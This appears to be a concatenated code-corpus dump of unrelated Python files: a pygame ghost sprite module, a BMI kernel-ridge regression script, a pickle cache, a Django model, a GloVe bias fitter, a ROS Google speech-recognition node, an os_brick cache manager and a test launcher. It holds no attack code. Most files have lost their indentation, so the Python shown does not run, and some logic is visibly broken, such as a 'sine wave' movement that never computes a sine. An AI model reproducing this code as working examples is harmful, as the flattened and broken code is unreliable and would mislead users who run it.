colour_list = os.listdir(path)
num_of_colours = len(colour_list)
for colour in colour_list:
imgs = []
for x in range(num_of_imgs):
imgs.append(pygame.image.load(os.path.join(path, colour+"/"+ str(x) + '.png')))
list_of_lists.append(imgs)
ghosts_list = []
collision_ghosts = [] # ghosts for which we have to check collision
def __init__(self,x,y,colour_num):
self.x = x
self.y = y
self.run_count = 0
self.colour_num = colour_num
random_num = random.uniform(6, 10)
self.ghosts_list = [pygame.transform.scale(img, (int(img.get_width()/random_num), int(img.get_height()/random_num))) for img in self.list_of_lists[colour_num]]
# Variables for sine wave trajectory calculation
self.org_y = y # initial y value where the ghost is spawned
self.time = 0 # Taken for a reference
self.frequency = random.uniform(0.005, 0.013) # frequency of sine wave
self.amplitude = random.randrange(30, 70) # Amplitude of sine wave - defines range of ghost movement in y axis
def draw(self, win):
# Determining index of ghost image to be drawn
self.frames_per_image = 7 # each ghost image is drawn for 7 consecutive frames
if self.run_count >= self.frames_per_image*self.num_of_imgs:
self.run_count = 0
self.index = self.run_count//self.frames_per_image
self.run_count += 1
# Drawing ghost image
self.img = self.ghosts_list[self.index]
self.randomize_movement()
win.blit(self.img, (self.x,self.y))
def randomize_movement(self):
# Sine wave trajectory for ghost
self.y= self.org_y
self.time += 1
def create_ghost():
"""
    Creates a ghost in the free space.
"""
    y = random.randint(50,400) # choose random y value in upper half of window (WIP)
    colour_num = random.randrange(Ghost.num_of_colours)
    new_ghost = Ghost(background_module.bg.get_width(), y, colour_num)
Ghost.ghosts_list.append(new_ghost)
Ghost.collision_ghosts.append(new_ghost) # To check collision
def draw_ghost(win):
for ghost in Ghost.ghosts_list:
ghost.draw(win)
update_ghosts_position()
def update_ghosts_position():
"""
Updates the x coordinates of ghost. If ghost goes offscreen, remove it from the list.
"""
for ghost in Ghost.ghosts_list:
        ghost_width = ghost.ghosts_list[0].get_width()  # width of this ghost's scaled image
        if ghost.x < -1*ghost_width: # If ghost goes offscreen, removing it from ghost list
            try:
                Ghost.ghosts_list.remove(ghost)  # remove from the class-level list of active ghosts
            except ValueError:
                pass
else:
ghost.x -= (foreground_module.foreground_speed + 4)
def collision_with_ghost():
"""
Collision with ghost is checked using Pixel perfect collision method. If collision occurs returns True, else False.
Collision is checked only if ghost is near the player to save computation.
"""
player = player_module.player
propeller = player_module.propeller
if len(Ghost.collision_ghosts)!=0:
for ghost in Ghost.collision_ghosts:
if ghost.x < (player.x + player.img.get_width()) and (ghost.x + ghost.img.get_width()) > player.x:
if ghost.y < (player.y + player.img.get_height()) and (ghost.y + ghost.img.get_height()) > player.y: # Checking for collision if near player
player_mask = pygame.mask.from_surface(player.img)
propeller_mask = pygame.mask.from_surface(propeller.propeller_img)
ghost_mask = pygame.mask.from_surface(ghost.img)
offset = int(ghost.x - player.x), int(ghost.y - player.y)
collision_point_with_player = player_mask.overlap(ghost_mask, offset)
collision_point_with_propeller = propeller_mask.overlap(ghost_mask, offset) # Checking collision with player
if collision_point_with_player or collision_point_with_propeller:
Ghost.collision_ghosts.remove(ghost)
return True
return False
| 3.296875
| 3
|
CombineAndRegress.py
|
FVL2020/2DImage2BMI
| 1
|
12783875
|
import json
from sklearn.metrics import mean_squared_error, mean_absolute_error
import numpy as np
from model import Dfembeding
from sklearn.kernel_ridge import KernelRidge
import torch
from PIL import Image
from utils import *
import csv
import torch.utils.data as data
import pandas as pd
def mean_absolute_percentage_error(y_true, y_pred):
y_true, y_pred = np.array(y_true), np.array(y_pred)
return np.mean(np.abs((y_true - y_pred) / y_true)) * 100
# class Dataset(data.Dataset):
# def __init__(self, file, transfrom):
# self.Pic_Names = os.listdir(file)
# self.file = file
# self.transfrom = transfrom
#
# def __len__(self):
# return len(self.Pic_Names)
#
# def __getitem__(self, idx):
# img_name = self.Pic_Names[idx]
# Pic = Image.open(os.path.join(self.file, self.Pic_Names[idx]))
# Pic = self.transfrom(Pic)
# try:
# ret = re.match(r"\d+?_([FMfm])_(\d+?)_(\d+?)_(\d+).+", img_name)
# BMI = (int(ret.group(4)) / 100000) / (int(ret.group(3)) / 100000) ** 2
# Pic_name = os.path.join(self.file, self.Pic_Names[idx])
# return (Pic, Pic_name), BMI
# except:
# return (Pic, ''), 10000
class Dataset(data.Dataset):
def __init__(self, file, transfrom):
self.Pic_Names = os.listdir(file)
self.file = file
self.transfrom = transfrom
def __len__(self):
return len(self.Pic_Names)
def __getitem__(self, idx):
img_name = self.Pic_Names[idx]
Pic = Image.open(os.path.join(self.file, self.Pic_Names[idx]))
Pic = self.transfrom(Pic)
ret = re.match(r"\d+?_([FMfm])_(\d+?)_(\d+?)_(\d+).+", img_name)
sex = 0 if (ret.group(1) == 'F' or ret.group(1) == 'f') else 1
age = int(ret.group(2))
height = int(ret.group(3)) / 100000
weight = int(ret.group(4)) / 100000
BMI = weight / (height ** 2)
# BMI = (int(ret.group(4))/100000) / (int(ret.group(3))/100000)**2
Pic_name = os.path.join(self.file, self.Pic_Names[idx])
return (Pic, Pic_name, img_name, sex, age, height, weight), BMI
def CombineDFBF(model, BodyFeatures, df, loader_test, loader_train):
# test(model, DEVICE, loader_test)
loaders = [ loader_test, loader_train,]
files = [ 'test', 'train',]
for loader, file in zip(loaders, files):
with open('/home/benkesheng/BMI_DETECT/Deep_Learning_Method/DF_BF_csv/20-1_{}.csv'.format(file), 'w',
newline='') as fp:
writer = csv.writer(fp)
model.eval()
pred = []
targ = []
for (img, name, img_name, sex, age, height, weight), target in loader:
values = []
img, target = img.to(DEVICE), target.to(DEVICE)
img_name = img_name[0]
# print('Processing IMage :', img_name)
values.append(img_name)
values.append(target.cpu().numpy()[0])
values.append(sex.numpy()[0])
values.append(BodyFeatures[img_name]['WSR'])
values.append(BodyFeatures[img_name]['WTR'])
values.append(BodyFeatures[img_name]['WHpR'])
values.append(BodyFeatures[img_name]['WHdR'])
values.append(BodyFeatures[img_name]['HpHdR'])
values.append(BodyFeatures[img_name]['Area'])
values.append(BodyFeatures[img_name]['H2W'])
conv_out = LayerActivations(model.fc, 1)
out = model(img)
pred.append(out.item())
targ.append(target.item())
conv_out.remove()
xs = torch.squeeze(conv_out.features.detach()).numpy()
# print(xs.shape)
for x in xs:
values.append(float(x))
values.append(age.numpy()[0])
values.append(height.numpy()[0])
values.append(weight.numpy()[0])
writer.writerow(values)
MAE = mean_absolute_error(targ, pred)
print(file,' ',MAE)
def Pre(raw_data, name):
if (name != 'vgg16'):
raw_data = raw_data.iloc[:, 1:]
raw_data = raw_data.replace([np.inf, -np.inf], np.nan)
# raw_data = raw_data.fillna(raw_data.mean())
raw_data = raw_data.replace(np.nan, 0)
raw_data = raw_data.values.astype(np.float64)
return raw_data
def Feature(data, df, name):
if (name == 'author'):
x_5f = data[:, 0:5]
y = data[:, 9]
return x_5f, y
elif (name == 'vgg16'):
x_df = data[:, 2:]
y = data[:, 0]
return x_df, y
elif (name == 'ours'):
x_5f = data[:, 3:8]
x_7f = data[:, 2:9]
x_df = data[:, 9:9 + df]
y = data[:, 0]
return x_5f, x_7f, x_df, y
def Stdm(x):
Mean = np.mean(x, axis=0)
Std = np.std(x, axis=0)
return Mean, Std
def Regression(df=20, file='test'):
# raw_data_train = pd.read_csv('/home/benkesheng/BMI_DETECT/ReDone_CSV/Ours/Image_train.csv')
# raw_data_test = pd.read_csv('/home/benkesheng/BMI_DETECT/ReDone_CSV/Ours/Image_test.csv')
raw_data_train = pd.read_csv('/home/benkesheng/BMI_DETECT/Deep_Learning_Method/DF_BF_csv/20-1_train.csv')
raw_data_test = pd.read_csv('/home/benkesheng/BMI_DETECT/Deep_Learning_Method/DF_BF_csv/20-1_test.csv')
raw_data_name = raw_data_test.values
raw_data_train = Pre(raw_data_train, 'ours')
raw_data_test = Pre(raw_data_test, 'ours')
x_5f_train, x_7f_train, x_df_train, y_train = Feature(raw_data_train, df, 'ours')
x_5f_test, x_7f_test, x_df_test, y_test = Feature(raw_data_test, df, 'ours')
x_body_train = x_7f_train
Mean, Std = Stdm(x_body_train)
x_body_train = (x_body_train - Mean) / Std
x_train = np.append(x_body_train, x_df_train, axis=1)
y_train = y_train
x_body_test = x_7f_test
x_body_test = (x_body_test - Mean) / Std
x_test = np.append(x_body_test, x_df_test, axis=1)
y_test = y_test
print(x_test.shape)
print(x_train.shape)
krr = KernelRidge()
krr.fit(x_train, y_train)
y_krr = krr.predict(x_test)
print('KRR: MAE: ', mean_absolute_error(y_test, y_krr), ' MAPE: ', mean_absolute_percentage_error(y_test, y_krr))
if file == 'demo':
for i, data in enumerate(x_test):
y_pred = krr.predict(data[None,:])
print('Name: ', raw_data_name[i][0], ' y_pred:', y_pred[0], ' y_ture:', y_test[i])
if __name__ == '__main__':
IMG_SIZE = 224
IMG_MEAN = [0.485, 0.456, 0.406]
IMG_STD = [0.229, 0.224, 0.225]
transform = transforms.Compose([
Resize(IMG_SIZE),
transforms.Pad(IMG_SIZE),
transforms.CenterCrop(IMG_SIZE),
transforms.ToTensor(),
transforms.Normalize(IMG_MEAN, IMG_STD)
])
DEVICE = torch.device("cuda:0")
dataset_train = Dataset('/home/benkesheng/BMI_DETECT/datasets/Image_train', transform)
dataset_test = Dataset('/home/benkesheng/BMI_DETECT/datasets/Image_test', transform)
loader_train = torch.utils.data.DataLoader(dataset_train, batch_size=1, shuffle=True)
loader_test = torch.utils.data.DataLoader(dataset_test, batch_size=1, shuffle=True)
df = 20
model = Dfembeding()
# model.load_state_dict(torch.load('/home/benkesheng/BMI_DETECT/ReDone_CSV/model/Ours.pkl'.format(df)))
model.load_state_dict(torch.load('/home/benkesheng/BMI_DETECT/MODEL/9-1reexperiment/MIN_RESNET101_BMI_20-1fc.pkl'))
model.to(DEVICE)
Path = '/home/benkesheng/BMI_DETECT/Deep_Learning_Method/datasets_bodyfeature/BodyFeature.json'
with open(Path, 'r') as f:
BodyFeatures = json.load(f)
# CombineDFBF(model, BodyFeatures, df, loader_test, loader_train)
Regression(df)
| 2.328125
| 2
|
alliancepy/cache.py
|
karx1/alliancepy
| 6
|
12783876
|
import pickle
class Cache:
def __init__(self):
self._filename = "alliancepy.txt"
self._cache = {}
def __enter__(self):
try:
with open(self._filename, "rb") as file:
d = pickle.load(file)
for key, value in d.items():
self._cache[key] = value
except (FileNotFoundError, EOFError):
self._cache = {}
finally:
return self
def __exit__(self, exc_type, exc_val, exc_tb):
with open(self._filename, "wb+") as file:
d = {}
for key, value in self._cache.items():
d[key] = value
pickle.dump(d, file)
def keys(self):
return self._cache.keys()
def add(self, key, value):
self._cache[key] = value
def get(self, key):
return self._cache[key]
def remove(self, key):
self._cache.pop(key, None)
def clear(self):
        # clear every cached entry (the original lazy map() call never executed)
        self._cache.clear()
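# Illustrative usage sketch (not part of the original module): the cache is meant
# to be used as a context manager, so entries are loaded from disk on entry and
# written back on exit; the key and value below are hypothetical placeholders.
#
# with Cache() as cache:
#     cache.add("team_16405", {"wins": 10})
#     if "team_16405" in cache.keys():
#         print(cache.get("team_16405"))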
| 3.390625
| 3
|
tests/integration/examples/multiply/test_example_multiply_configs.py
|
drohde/deepr
| 0
|
12783877
|
"""Test for examples.multiply.configs"""
import logging
import deepr as dpr
import deepr.examples.multiply
logging.basicConfig(level=logging.INFO)
PATH_CONFIG = dpr.io.Path(deepr.examples.multiply.__file__).parent / "configs"
def test_example_multiply_configs(tmpdir):
"""Test for examples.multiply.configs"""
path_model = str(tmpdir.join("model"))
path_dataset = str(tmpdir.join("dataset"))
config = dpr.io.read_json(PATH_CONFIG / "config.json")
macros = dpr.io.read_json(PATH_CONFIG / "macros.json")
macros["paths"]["path_model"] = path_model
macros["paths"]["path_dataset"] = path_dataset
parsed = dpr.parse_config(config, macros)
job = dpr.from_config(parsed)
job.run()
| 2.15625
| 2
|
app/models.py
|
stefanbschneider/feelya
| 1
|
12783878
|
<reponame>stefanbschneider/feelya
import datetime
from django.db import models
from django.urls import reverse
from django.contrib.auth.models import User
class Entry(models.Model):
name = models.CharField(max_length=100)
date = models.DateField('date tracked', default=datetime.date.today)
owner = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)
def __str__(self):
return self.name
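# Illustrative usage sketch (not part of the original module); assumes a `user`
# instance obtained elsewhere:
#
# entry = Entry.objects.create(name="coffee", date=datetime.date.today(), owner=user)
# print(entry)  # -> "coffee"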
| 2.21875
| 2
|
workflow/utils_link_pred.py
|
skojaku/residual2vec
| 2
|
12783879
|
import numpy as np
from scipy import sparse
def fit_glove_bias(A, emb):
N = A.shape[0]
row_sum = np.array(A.sum(axis=1)).reshape(-1).astype(float)
col_sum = np.array(A.sum(axis=0)).reshape(-1).astype(float)
emb_sum = np.array(emb @ np.array(np.sum(emb, axis=0)).reshape((-1, 1))).reshape(-1)
row_sum -= emb_sum
col_sum -= emb_sum
a = np.zeros(N)
b = np.zeros(N)
adam_a = ADAM()
adam_b = ADAM()
for it in range(1000):
grad_a = row_sum - np.sum(b) * a
grad_b = col_sum - np.sum(a) * b
anew = adam_a.update(a, grad_a, 0)
bnew = adam_b.update(b, grad_b, 0)
if it % 20 == 0:
dif = np.mean(np.abs(a - anew) + np.abs(b - bnew)) / 2
dif /= np.maximum(np.mean(np.abs(a) + np.abs(b)) / 2, 1e-8)
if dif < 1e-2:
break
a = anew.copy()
b = bnew.copy()
return a, b
class ADAM:
def __init__(self):
self.beta1 = 0.9
self.beta2 = 0.999
self.eta = 0.001
self.t = 0
self.mt = None
self.vt = None
self.eps = 1e-8
def update(self, theta, grad, lasso_penalty, positiveConstraint=False):
"""Ascending."""
if self.mt is None:
self.mt = np.zeros(grad.shape)
self.vt = np.zeros(grad.shape)
self.t = self.t + 1
self.mt = self.beta1 * self.mt + (1 - self.beta1) * grad
self.vt = self.beta2 * self.vt + (1 - self.beta2) * np.multiply(grad, grad)
mthat = self.mt / (1 - np.power(self.beta1, self.t))
vthat = self.vt / (1 - np.power(self.beta2, self.t))
new_grad = mthat / (np.sqrt(vthat) + self.eps)
return self._prox(
theta + self.eta * new_grad, lasso_penalty * self.eta, positiveConstraint
)
def _prox(self, x, lam, positiveConstraint):
"""Soft thresholding operator.
Parameters
----------
x : float
Variable.
lam : float
Lasso penalty.
Returns
-------
y : float
Thresholded value of x.
"""
if positiveConstraint:
b = ((lam) > 0).astype(int)
return np.multiply(b, np.maximum(x - lam, np.zeros(x.shape))) + np.multiply(
1 - b,
np.multiply(np.sign(x), np.maximum(np.abs(x) - lam, np.zeros(x.shape))),
)
else:
return np.multiply(
np.sign(x), np.maximum(np.abs(x) - lam, np.zeros(x.shape))
)
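# Illustrative usage sketch (not part of the original module): fit_glove_bias
# expects an adjacency matrix and a node embedding with the same number of rows;
# the random inputs below are placeholders.
#
# A = sparse.random(100, 100, density=0.05, format="csr")
# emb = np.random.randn(100, 16)
# a, b = fit_glove_bias(A, emb)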
| 2.4375
| 2
|
rapp_speech_detection_google/src/speech_recognition_google.py
|
DEVX1/NAOrapp-Pythonlib
| 0
|
12783880
|
<gh_stars>0
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
#Copyright 2015 RAPP
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import rospy
import httplib
import json
import sys
import os
from pylab import *
from scipy.io import wavfile
from rapp_platform_ros_communications.srv import (
SpeechToTextSrv,
SpeechToTextSrvResponse
)
from rapp_platform_ros_communications.srv import (
AudioProcessingDenoiseSrv,
AudioProcessingDenoiseSrvResponse,
AudioProcessingDenoiseSrvRequest
)
from rapp_platform_ros_communications.srv import (
AudioProcessingTransformAudioSrv,
AudioProcessingTransformAudioSrvResponse,
AudioProcessingTransformAudioSrvRequest
)
from rapp_platform_ros_communications.msg import (
StringArrayMsg
)
from rapp_exceptions import RappError
## @class SpeechToTextGoogle
# Implements calls the Google ASR API
class SpeechToTextGoogle:
    ## Default constructor. Declares the service callback
def __init__(self):
# Speech recognition service published
self.serv_topic = rospy.get_param("rapp_speech_detection_google_detect_speech_topic")
if(not self.serv_topic):
            rospy.logerr("Speech detection google topic param not found")
self.serv = rospy.Service(self.serv_topic, \
SpeechToTextSrv, self.speech_to_text_callback)
## @brief The service callback
# @param req [SpeechToTextSrvRequest] The ROS service request
def speech_to_text_callback(self, req):
res = SpeechToTextSrvResponse()
if req.language == '':
res.error = 'No language specified'
return res
# Getting the results in order to parse them
try:
transcripts = self.speech_to_text(\
req.filename,\
req.user,\
req.audio_type,\
req.language)
#print transcripts
except RappError as e:
res.error = e.value
return res
if len(transcripts['result']) == 0:
return res
# The alternative results
alternatives = transcripts['result'][0]['alternative']
res = SpeechToTextSrvResponse()
# If alternatives is 0 returns void response
if len(alternatives) > 0:
# The first alternative is Google's suggestion
words = alternatives[0]['transcript'].split(" ")
for w in words:
res.words = res.words + [w]
# Google provides the confidence for the first suggestion
if 'confidence' in alternatives[0].keys():
res.confidence.data = alternatives[0]['confidence']
else:
res.confidence.data = 0
for alt in alternatives[1:]:
sam = StringArrayMsg()
words = alt['transcript'].split(" ")
for w in words:
sam.s = sam.s + [w]
res.alternatives = res.alternatives + [sam]
else:
res.confidence.data = 0
return res
## @brief Performs the call to Google API
# @param file_path [string] The audio file
# @param user [string] The username
# @param audio_type [string] Used to check if denoising is needed. Can be one of headset, nao_ogg, nao_wav_1_ch, nao_wav_4_ch
# @param language [string] The language in which the ASR will be performed
# @return The transcript from Google
def speech_to_text(self, file_path, user, audio_file_type, language):
# Check if file exists
if not os.path.isfile(file_path):
raise RappError("Error: file " + file_path + ' not found')
# Check if file is flac. If not convert it
new_audio = file_path
audio_trans_topic = rospy.get_param("rapp_audio_processing_transform_audio_topic")
audio_transform_srv = rospy.ServiceProxy( audio_trans_topic, AudioProcessingTransformAudioSrv )
cleanup = []
transform_req = AudioProcessingTransformAudioSrvRequest()
transform_req.source_type = audio_file_type
transform_req.source_name = new_audio
transform_req.target_type = 'wav'
new_audio += '.wav'
transform_req.target_name = new_audio
transform_req.target_channels = 1
transform_req.target_rate = 16000
trans_response = audio_transform_srv( transform_req )
if trans_response.error != 'success':
raise RappError( trans_response.error )
cleanup.append(new_audio)
# Denoise if necessary
prev_audio_file = new_audio
next_audio_file = prev_audio_file
if audio_file_type in ['nao_ogg', 'nao_wav_1_ch', 'nao_wav_4_ch']:
denoise_topic = rospy.get_param("rapp_audio_processing_denoise_topic")
energy_denoise_topic = \
rospy.get_param("rapp_audio_processing_energy_denoise_topic")
denoise_service = rospy.ServiceProxy(\
denoise_topic, AudioProcessingDenoiseSrv)
energy_denoise_service = rospy.ServiceProxy(\
energy_denoise_topic, AudioProcessingDenoiseSrv)
manipulation = {}
manipulation['sox_transform'] = False
manipulation['sox_denoising'] = False
manipulation['sox_channels_and_rate'] = False
if audio_file_type == "headset":
pass
elif audio_file_type == "nao_ogg":
manipulation['sox_transform'] = True
manipulation['sox_denoising'] = True
manipulation['sox_denoising_scale'] = 0.15
elif audio_file_type == "nao_wav_4_ch":
manipulation['sox_channels_and_rate'] = True
manipulation['sox_denoising'] = True
manipulation['sox_denoising_scale'] = 0.15
elif audio_file_type == "nao_wav_1_ch":
manipulation['sox_denoising'] = True
manipulation['sox_denoising_scale'] = 0.15
manipulation['detect_silence'] = True
manipulation['detect_silence_threshold'] = 0.25
# Check if sox_transform is needed
if manipulation['sox_transform'] == True:
next_audio_file += "_transformed.wav"
command = "sox " + prev_audio_file + " " + next_audio_file
com_res = os.system(command)
if com_res != 0:
raise RappError("Error: sox malfunctioned")
cleanup.append(next_audio_file)
prev_audio_file = next_audio_file
if manipulation['sox_channels_and_rate'] == True:
next_audio_file += "_mono16k.wav"
command = "sox " + prev_audio_file + " -r 16000 -c 1 " + next_audio_file
com_res = os.system(command)
if com_res != 0:
raise RappError("Error: sox malfunctioned")
cleanup.append(next_audio_file)
prev_audio_file = next_audio_file
if manipulation['sox_denoising'] == True:
next_audio_file = prev_audio_file + "_denoised.wav"
den_request = AudioProcessingDenoiseSrvRequest()
den_request.audio_file = prev_audio_file
den_request.denoised_audio_file = next_audio_file
den_request.audio_type = audio_file_type
den_request.user = user
den_request.scale = manipulation['sox_denoising_scale']
den_response = denoise_service(den_request)
if den_response.success != "true":
raise RappError("Error:" + den_response.success)
cleanup.append(next_audio_file)
prev_audio_file = next_audio_file
# must implement a fallback function to clear redundant files
# Transform to flac
transform_req = AudioProcessingTransformAudioSrvRequest()
transform_req.source_type = 'headset'
transform_req.source_name = new_audio
transform_req.target_type = 'flac'
newer_audio = new_audio + '.flac'
transform_req.target_name = newer_audio
transform_req.target_channels = 1
transform_req.target_rate = 16000
trans_response = audio_transform_srv( transform_req )
cleanup.append(newer_audio)
if trans_response.error != 'success':
raise RappError( trans_response.error )
# Open the file
with open(newer_audio, "r") as f:
speech = f.read()
url = "www.google.com"
# Fix language
if language == 'en':
language = "en-US"
elif language == 'gr':
language = 'el'
        #NOTE - That's a general usage key. They may disable it in the future.
key = "<KEY>"
path = "/speech-api/v2/recognize?lang=" + language + "&key=" + key
        headers = {"Content-type": "audio/x-flac; rate=22050"}
params = {"xjerr": "1", "client": "chromium"}
conn = httplib.HTTPSConnection(url)
conn.request("POST", path, speech, headers)
response = conn.getresponse()
data = response.read()
initial_data = data
# Google returns one empty result for some reason here. Removing it..
index = data.find("}")
data = data[index + 1:]
if data == '\n':
# Returned nothing.. something went wrong
data = initial_data
jsdata = json.loads(data)
# Remove the flac if needed
for f in cleanup:
command = 'rm -f ' + f
if os.system(command):
raise RappError("Error: Removal of temporary file malfunctioned")
return jsdata
## The main function. Creates a SpeechToTextGoogle object
if __name__ == "__main__":
rospy.init_node('speech_to_text_ros_node')
speech_to_text_node = SpeechToTextGoogle()
rospy.spin()
| 2.078125
| 2
|
apps/shows/migrations/0010_show_social.py
|
jorgesaw/oclock
| 0
|
12783881
|
# Generated by Django 2.2.13 on 2020-10-04 06:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('socials', '0004_auto_20201004_0347'),
('shows', '0009_auto_20201004_0137'),
]
operations = [
migrations.AddField(
model_name='show',
name='social',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='socials.UserSocialNetwork', verbose_name='Social Network'),
),
]
| 1.484375
| 1
|
Labs/Unit1Lesson3.py
|
CAP1Sup/SieskoPythonLabs
| 0
|
12783882
|
# <NAME>
# 9/9/19
# This program will ask the user for a few words and then create a story like a Mad Libs paper.
def main():
name = input("Please put in the name of a person: ")
verb1 = input("Please input a verb in infinitive form: ")
noun = input("Please input a proper noun: ")
ability = input("Please input an ability in infinitive form (ex fly): ")
num1 = input("Please input a number: ")
unit1 = input("Please input a unit that has to do with the ability: ")
ability2 = input("Please enter a second ability: ")
num2 = input("Please input a second number: ")
unit2 = input("Please input a second unit (in infinitive) that would fit with the second ability: ")
deathDate = input("Please input a date in the future: ")
print()
print("One day,", name, "was", verb1, "in a forest.")
print("All of the sudden,", name, "fell asleep.")
nameWithS = (name + "'s")
print("Then,", noun, "appeared in", nameWithS, "dream")
print(name, "woke up suddenly.")
print(name, "went home, and felt tired, so", name, "went to bed.")
print("The next morning,", name, "had the ability to", ability)
print(name, "discovered that he/she could", ability, "at", num1, unit1)
print(name, "also found at that he/she could", ability2, "at", num2, unit2)
print(name, "saved the world from the plans of the evil Doctor Siesko. He then promptly enjoyed the rest of his life until the day he died,", deathDate)
main()
| 4.25
| 4
|
assignment_dashboard/config.py
|
osteele/assignment-dashboard
| 0
|
12783883
|
<filename>assignment_dashboard/config.py
import os
class BaseConfig(object):
DEBUG_TB_INTERCEPT_REDIRECTS = False
SECRET_KEY = os.environ.get('SECRET_KEY', 'change me in production')
db_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../data/database.db'))
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL', 'sqlite:///' + db_path)
SQLALCHEMY_ECHO = True if os.environ.get('SQLALCHEMY_ECHO') else False
SQLALCHEMY_TRACK_MODIFICATIONS = False
TZ = os.environ.get('TZ', 'US/Eastern')
if 'GITHUB_CLIENT_ID' in os.environ:
REQUIRE_LOGIN = True
GITHUB_CLIENT_ID = os.environ['GITHUB_CLIENT_ID']
GITHUB_CLIENT_SECRET = os.environ['GITHUB_CLIENT_SECRET']
else:
REQUIRE_LOGIN = False
if 'REDIS_HOST' in os.environ:
REDIS_HOST = os.environ['REDIS_HOST']
| 2.03125
| 2
|
Python/Stacks/BalancedBrackets/BalancedBrackets.py
|
zseen/hackerrank-challenges
| 0
|
12783884
|
#!/bin/python3
import math
import os
import random
import re
import sys
BRACKETS_DICT = {"(": ")", "[": "]", "{": "}"}
def printIsBalanced(brackets):
result = isBalanced(brackets)
if result:
print("YES")
else:
print("NO")
def isBalanced(brackets):
stack = []
for bracket in brackets:
if bracket in BRACKETS_DICT.keys():
stack.append(bracket)
else:
if not stack or bracket != BRACKETS_DICT[stack.pop()]:
return False
if stack:
return False
return True
if __name__ == '__main__':
sys.stdin = open("BalancedBrackets_input.txt")
t = int(input())
for _ in range(t):
s = input()
printIsBalanced(s)
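# Expected stdin layout (illustrative sample, not part of the original file): the first
# line is the number of queries, followed by one bracket string per line, e.g.
#   3
#   {[()]}
#   {[(])}
#   {{[[(())]]}}
# which should print YES, NO, YES respectively.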
| 3.890625
| 4
|
os_brick/caches/__init__.py
|
KioxiaAmerica/os-brick
| 61
|
12783885
|
<filename>os_brick/caches/__init__.py
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import abc
from oslo_log import log as logging
from oslo_utils import importutils
from os_brick import exception
from os_brick.i18n import _
LOG = logging.getLogger(__name__)
CACHE_ENGINE_TO_CACHE_CLASS_MAP = {
"opencas": 'os_brick.caches.opencas.OpenCASEngine',
}
class CacheEngineBase(object, metaclass=abc.ABCMeta):
def __init__(self, **kwargs):
self._root_helper = kwargs.get('root_helper')
@abc.abstractmethod
def is_engine_ready(self, **kwargs):
return
@abc.abstractmethod
def attach_volume(self, **kwargs):
return
@abc.abstractmethod
def detach_volume(self, **kwargs):
return
class CacheManager():
"""Cache manager for volumes.
    This CacheManager uses cache engines to cache volumes.
"""
def __init__(self, root_helper, connection_info,
*args, **kwargs):
data = connection_info['data']
if not data.get('device_path'):
volume_id = data.get('volume_id') or connection_info.get('serial')
raise exception.VolumeLocalCacheNotSupported(
volume_id=volume_id,
volume_type=connection_info.get('driver_volume_type'))
self.ori_device_path = data.get('device_path')
if not data.get('cacheable'):
self.cacheable = False
return
self.cacheable = True
self.root_helper = root_helper
self.engine_name = kwargs.get('cache_name')
self.args = args
self.kwargs = kwargs
self.kwargs["root_helper"] = root_helper
self.kwargs["dev_path"] = data.get('device_path')
self.engine = self._get_engine(self.engine_name, **self.kwargs)
def _get_engine(self, engine_name, **kwargs):
eng_cls_path = CACHE_ENGINE_TO_CACHE_CLASS_MAP.get(engine_name)
if eng_cls_path:
engine_cls = importutils.import_class(eng_cls_path)
eng = engine_cls(**kwargs)
if eng.is_engine_ready():
return eng
raise exception.Invalid(_("No valid cache engine"))
def attach_volume(self):
"""setup the cache when attaching volume."""
if not self.cacheable:
return self.ori_device_path
LOG.debug("volume before cached: %s", self.kwargs.get('dev_path'))
emulated_disk = self.engine.attach_volume(**self.kwargs)
LOG.debug("volume after cached: %s", emulated_disk)
return emulated_disk
def detach_volume(self):
"""Release the cache on detaching volume."""
if not self.cacheable:
return self.ori_device_path
LOG.debug("volume before detach: %s", self.kwargs.get('dev_path'))
ori_disk = self.engine.detach_volume(**self.kwargs)
LOG.debug("volume after detach: %s", ori_disk)
return ori_disk
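# Illustrative usage sketch (hypothetical values; requires an engine such as 'opencas'
# to be installed and ready on the host):
#   conn_info = {'data': {'device_path': '/dev/sdb', 'cacheable': True, 'volume_id': 'vol-1'}}
#   mgr = CacheManager(root_helper, conn_info, cache_name='opencas')
#   emulated_dev = mgr.attach_volume()   # path of the cache-fronted device
#   ...
#   mgr.detach_volume()                  # release the cache and return to the original device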
| 2.28125
| 2
|
py_helloworld/test/run.py
|
mingshi-wang/fp20
| 2
|
12783886
|
<filename>py_helloworld/test/run.py
"""Universal launcher for unit tests"""
import argparse
import logging
import os
import sys
import unittest
def main():
"""Parse args, collect tests and run them"""
# Disable *.pyc files
sys.dont_write_bytecode = True
# Add ".." to module search path
cur_dir = os.path.dirname(os.path.realpath(__file__))
top_dir = os.path.abspath(os.path.join(cur_dir, os.pardir))
sys.path.append(top_dir)
# Parse command line arguments
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("-v", "--verbose", action="count", default=0,
help="verbosity level, use: [-v | -vv | -vvv]")
parser.add_argument("-s", "--start-directory", default=None,
help="directory to start discovery")
parser.add_argument("-p", "--pattern", default="test*.py",
help="pattern to match test files ('test*.py' default)")
parser.add_argument("test", nargs="*",
help="test specs (e.g. module.TestCase.test_func)")
args = parser.parse_args()
if not args.start_directory:
args.start_directory = cur_dir
if args.verbose > 2:
logging.basicConfig(level=logging.DEBUG, format="DEBUG: %(message)s")
loader = unittest.TestLoader()
    if args.test:
        # Add particular tests (build one suite so every named test runs, not just the last)
        suite = unittest.TestSuite()
        for test in args.test:
            suite.addTests(loader.loadTestsFromName(test))
else:
# Find all tests
suite = loader.discover(args.start_directory, args.pattern)
